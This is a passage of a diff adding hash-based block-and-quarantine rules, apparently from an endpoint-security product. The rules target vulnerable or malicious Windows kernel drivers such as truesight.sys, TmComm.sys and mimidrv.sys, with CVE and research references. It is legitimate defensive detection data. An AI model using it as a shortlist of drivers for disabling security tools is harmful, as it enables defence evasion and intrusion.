+ "last_update": "2026-03-23T11:45:31.497633Z",
+ "creation_date": "2026-03-23T11:45:31.497635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32b31efcb4501bbf20ced801dbba29f6bddccf7ff67faa593fc97025ff37f41f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c73b6387-005e-51c7-8d67-ac67f70a17eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610194Z",
+ "creation_date": "2026-03-23T11:45:29.610196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a13578aa1c9896c3753047ea05fd6a98af11044a544b0ad641bf3e15369c7601",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c743cc7b-ffde-5b7f-874d-14ad08b8c347",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461381Z",
+ "creation_date": "2026-03-23T11:45:30.461384Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8ff25255202321bd00f7aa792800e1fb7aab506dca771a4a8e2cc1af265fa15",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c74ec9dc-7e37-584f-94ca-618dd7307e68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814235Z",
+ "creation_date": "2026-03-23T11:45:31.814238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66687204c5683cd336e2af70f36f4bace8f1ea140617586f2bd923d2dcde76b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7533662-92f0-5719-a8a8-2bb1abf870ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498415Z",
+ "creation_date": "2026-03-23T11:45:31.498419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e37c23ba30bfbf296bc6ff82cebd5a007f96e512dce4c384e9330c99b4474d24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c758dfb4-8387-5019-aa04-9be63554c24d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148852Z",
+ "creation_date": "2026-03-23T11:45:31.148854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81430b45a27126a4de491b6afbdd4dcb93b4a03c92490735fa412bfdd907a6ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c75a0cfd-fc25-5a39-8d76-3c93ee5474fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153310Z",
+ "creation_date": "2026-03-23T11:45:31.153314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc740973f3bb30cdc702f350fadb92a7bfd6b68b1625e96b16c15faadc589e32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7630799-cca9-5177-abed-886926039931",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455528Z",
+ "creation_date": "2026-03-23T11:45:30.455532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec9bd7fb90c3a2aa4605bd73fe1f74399e2cda75fd4c5fff84660ad4f797c4fe",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c764d18c-4400-504c-9778-b43102007609",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971767Z",
+ "creation_date": "2026-03-23T11:45:29.971769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184",
+ "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c768da48-5ff7-57b1-8771-facb010b3644",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143290Z",
+ "creation_date": "2026-03-23T11:45:31.143292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "688420dc64baecc92f9326418e6f178f60c5468a333ecd68f11618aab2f9612a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c76c3997-a1f6-56f4-ac8a-10635632ef19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463585Z",
+ "creation_date": "2026-03-23T11:45:30.463589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30e083cd7616b1b969a92fd18cf03097735596cce7fcf3254b2ca344e526acc2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c78ea98d-18e1-5e27-9d4a-a8165fb0cefb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473425Z",
+ "creation_date": "2026-03-23T11:45:30.473429Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84c5f6ddd9c90de873236205b59921caabb57ac6f7a506abbe2ce188833bbe51",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c796c22d-ab65-594d-8731-8ce2d9eaa5ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159616Z",
+ "creation_date": "2026-03-23T11:45:31.159618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "722f0f8b1c285e438c4b679d9db4372c6235ee6886a0bd05222db7dfe59497d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7b995d8-f087-57da-8a52-dd073f2b18b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974264Z",
+ "creation_date": "2026-03-23T11:45:29.974266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3847a1ed764ba25361a1748761fd9a1cbb65e42db00094f8ad6def9ac5da4116",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7bca650-ec00-5115-9c31-60c250eb62c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473689Z",
+ "creation_date": "2026-03-23T11:45:30.473692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5c8521c00f0a9003d3f91abb0b881e8657ba5f5cf74a1223a88499a85916e68",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7c7212a-a7bf-59cf-b59b-ac3a55c40888",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818651Z",
+ "creation_date": "2026-03-23T11:45:31.818655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2891d9f9bd5037598ad6441fb92fbe283afcd5b538f022583cf1bbb881d7a693",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7d38e76-8ce5-5909-86e1-9edb09c7c4f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152109Z",
+ "creation_date": "2026-03-23T11:45:31.152112Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23c787b0a5c706dedf083f0d219ef18ec07a62b33bcd6016e2e66d0b7b3009cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7d40069-2da6-5e1d-94fe-8303eace72bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488379Z",
+ "creation_date": "2026-03-23T11:45:31.488381Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2843834ebfd4c0bc906b90a2f8be6e2b0ced788b8a26296536bcaa8be9ee132f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7db2e31-63dd-52ea-9063-4a214a529482",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608282Z",
+ "creation_date": "2026-03-23T11:45:29.608284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7281a3b0fa9a17b45fb5f2b6ab31e521495a524ad040dfe5591394952a8d5c81",
+ "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7dcdc0b-135a-5f74-968b-701d76ab3af4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145272Z",
+ "creation_date": "2026-03-23T11:45:31.145274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34028d77b89865fca9790769f3f2e8feabd3be85d905ce4abd3f57b1b72561e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7e1bc65-5161-5f0e-82ce-6c50ad5f2c7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973637Z",
+ "creation_date": "2026-03-23T11:45:29.973638Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973644Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e37592a2a415f520438330c32cfbdbd6af594deef5290b2fa4b9722b898ff69",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7e9a127-fbf0-513c-9931-eaa843568bbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818434Z",
+ "creation_date": "2026-03-23T11:45:30.818436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3b5fd13a53eee5c468c8bfde4bfa7b968c761f9b781bb80ccd5637ee052ee7d",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7f4d28b-0ff5-57e9-9251-25d24d17dba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152185Z",
+ "creation_date": "2026-03-23T11:45:31.152188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
